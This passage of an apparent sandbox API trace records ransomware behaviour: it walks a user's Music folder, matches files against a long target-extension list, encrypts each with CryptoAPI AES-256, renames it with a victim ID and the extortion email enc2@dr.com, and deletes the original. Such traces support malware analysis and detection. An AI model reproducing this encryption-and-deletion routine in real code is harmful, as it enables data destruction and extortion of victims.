i.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0194.471] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.472] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.472] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0194.476] ReadFile (in: hFile=0x390, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xb383, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x189930*=0xb383, lpOverlapped=0x0) returned 1
	[0194.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.481] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb198) returned 1
	[0194.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.484] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0194.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.484] CryptHashData (hHash=0xfb95b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0194.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.484] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb95b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb91f0) returned 1
	[0194.484] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.485] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0xb383, dwBufLen=0xb383 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0xb390) returned 1
	[0194.486] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.486] RtlMoveMemory (in: Destination=0xfe8510, Source=0xfdd180, Length=0xb383 | out: Destination=0xfe8510) 
	[0194.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.487] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe8510*, pdwDataLen=0x1894dc*=0xb383, dwBufLen=0xb390 | out: pbData=0xfe8510*, pdwDataLen=0x1894dc*=0xb390) returned 1
	[0194.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.487] CryptDestroyKey (hKey=0xfb91f0) returned 1
	[0194.487] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.488] CryptDestroyHash (hHash=0xfb95b0) returned 1
	[0194.488] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.488] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0194.488] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.488] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.489] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.489] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0194.490] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0194.490] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0194.491] WriteFile (in: hFile=0x39c, lpBuffer=0xfe8510*, nNumberOfBytesToWrite=0xb390, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe8510*, lpNumberOfBytesWritten=0x189938*=0xb390, lpOverlapped=0x0) returned 1
	[0194.497] CloseHandle (hObject=0x39c) returned 1
	[0194.497] CloseHandle (hObject=0x390) returned 1
	[0194.497] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a")) returned 1
	[0194.505] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uf ibx-mj-z3dshsxti.m4a")) returned 0
	[0194.505] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea21a180, ftCreationTime.dwHighDateTime=0x1d96636, ftLastAccessTime.dwLowDateTime=0x9a499600, ftLastAccessTime.dwHighDateTime=0x1d9669e, ftLastWriteTime.dwLowDateTime=0x9a499600, ftLastWriteTime.dwHighDateTime=0x1d9669e, nFileSizeHigh=0x0, nFileSizeLow=0x163e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UWzxJ0YL2nK.mp3", cAlternateFileName="UWZXJ0~1.MP3")) returned 1
	[0194.505] lstrcmpW (lpString1="UWzxJ0YL2nK.mp3", lpString2="..") returned 1
	[0194.505] lstrcmpW (lpString1="UWzxJ0YL2nK.mp3", lpString2=".") returned 1
	[0194.505] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\"
	[0194.506] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\", lpString2="UWzxJ0YL2nK.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\UWzxJ0YL2nK.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\UWzxJ0YL2nK.mp3"
	[0194.506] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\UWzxJ0YL2nK.mp3") returned 91
	[0194.506] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.506] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\UWzxJ0YL2nK.mp3", cchLength=0x5b | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3") returned 0x5b
	[0194.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.506] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0194.507] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3"
	[0194.507] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3") returned 91
	[0194.507] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.507] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.507] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0194.508] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.508] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0194.508] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.508] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.509] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0194.516] ReadFile (in: hFile=0x390, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x163e0, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x189930*=0x163e0, lpOverlapped=0x0) returned 1
	[0194.520] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.521] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcaef0) returned 1
	[0194.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.523] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0194.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.524] CryptHashData (hHash=0xfb9470, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0194.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.524] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9470, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb93b0) returned 1
	[0194.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.524] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x163e0, dwBufLen=0x163e0 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x163f0) returned 1
	[0194.527] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.541] RtlMoveMemory (in: Destination=0xff3568, Source=0xfdd180, Length=0x163e0 | out: Destination=0xff3568) 
	[0194.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.542] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3568*, pdwDataLen=0x1894dc*=0x163e0, dwBufLen=0x163f0 | out: pbData=0xff3568*, pdwDataLen=0x1894dc*=0x163f0) returned 1
	[0194.542] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.542] CryptDestroyKey (hKey=0xfb93b0) returned 1
	[0194.543] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.543] CryptDestroyHash (hHash=0xfb9470) returned 1
	[0194.543] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.543] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0194.543] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.544] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.544] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.544] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0194.546] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 133
	[0194.546] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0194.546] WriteFile (in: hFile=0x39c, lpBuffer=0xff3568*, nNumberOfBytesToWrite=0x163f0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xff3568*, lpNumberOfBytesWritten=0x189938*=0x163f0, lpOverlapped=0x0) returned 1
	[0194.554] CloseHandle (hObject=0x39c) returned 1
	[0194.554] CloseHandle (hObject=0x390) returned 1
	[0194.554] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3")) returned 1
	[0194.565] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\uwzxj0yl2nk.mp3")) returned 0
